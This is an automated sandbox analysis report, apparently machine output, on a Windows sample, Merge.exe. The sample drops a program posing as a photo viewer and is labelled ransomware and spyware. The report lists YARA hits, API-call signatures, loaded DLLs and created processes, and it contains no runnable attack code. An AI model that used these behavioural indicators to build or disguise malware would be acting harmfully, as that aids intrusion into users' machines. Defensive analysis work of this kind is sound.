Source: Yara match | File source: 6.3.DisplayPhotoViewer.exe.af32b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.DisplayPhotoViewer.exe.11000000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DisplayPhotoViewer.exe PID: 7172, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1110DC60 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

                                System Summary

Source: RwcTouch.dll.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: bass.dll.0.dr | Static PE information: section name:
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1110DB00 GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_111533D0 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1102BC80 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10045800
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004B810
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004E420
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10076030
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1006C840
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10042850
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004C880
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004E090
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10049CB0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004C0C0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_100728C0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004DCE0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004D8F0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10040100
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10104530
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10075920
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004D530
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004C540
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10045D50
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004D170
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10074D70
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10047990
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004A5B0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004CDD0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_100489F0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10046610
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10047E30
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004BE30
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10075660
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004F680
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10074280
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10071A90
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004AEA0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_100692C0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004BAE0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004C300
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10073F10
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1004CB30
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10008740
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10047760
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10044770
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10049370
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10041380
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1006C390
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10041FA0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1006B3D0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10047BE0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10702130
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1070698F
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_107036C0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1105DDB0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11028090
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1106EC60
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110833A0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11031570
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1101B580
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1106B9D0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1107BB50
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11043B90
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1111DA20
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: String function: 11027F50 appears 496 times
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: String function: 110265F0 appears 31 times
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: String function: 1113C600 appears 314 times
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: String function: 11059E50 appears 151 times
Source: DisplayPhotoViewer.exe.0.dr | Static PE information: Number of sections : 11 > 10
Source: Merge.exe, 00000000.00000002.2574316592.0000000003950000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSecondaryDisplayPhotoViewer.exe^ vs Merge.exe
Source: Merge.exe, 00000000.00000003.2544634565.0000000003951000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezxing.dll4 vs Merge.exe
Source: Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRwcTouch.dll> vs Merge.exe
Source: Merge.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: bass.dll.0.dr | Static PE information: Section: ZLIB complexity 0.9999206046747967
Source: classification engine | Classification label: mal42.rans.spyw.evad.winEXE@3/44@2/2
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11055D80 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11098130 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110981C0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1110DF20 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110C79F0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1111FF80 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Mutant created: \Sessions\1\BaseNamedObjects\58849237
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Temp\s5sg.0
Source: Merge.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Merge.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Merge.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Merge.exe | Virustotal: Detection: 19%
Source: Merge.exe | ReversingLabs: Detection: 15%
Source: unknown | Process created: C:\Users\user\Desktop\Merge.exe "C:\Users\user\Desktop\Merge.exe"
Source: C:\Users\user\Desktop\Merge.exe | Process created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
Source: C:\Users\user\Desktop\Merge.exe | Process created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: quserex.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Merge.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: filesystemdialogs.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: jencrypt.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: opengl32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: glu32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: freeimage.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: mediainfo.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: compstui.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: bassmix.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: security.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: dinput8.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: xinput1_4.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: zxing.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: quserex.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: rwctouch.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: d2d1.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: idndl.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: bass.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wmp.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: gnsdk_fp.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wmvcore.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wmasf.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wmploc.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: audioses.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: wmnetmgr.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Section loaded: msv1_0.dll
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ntlmshared.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: cryptdll.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wdigest.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: thumbcache.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: networkexplorer.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: resourcepolicyclient.dllJump to behavior
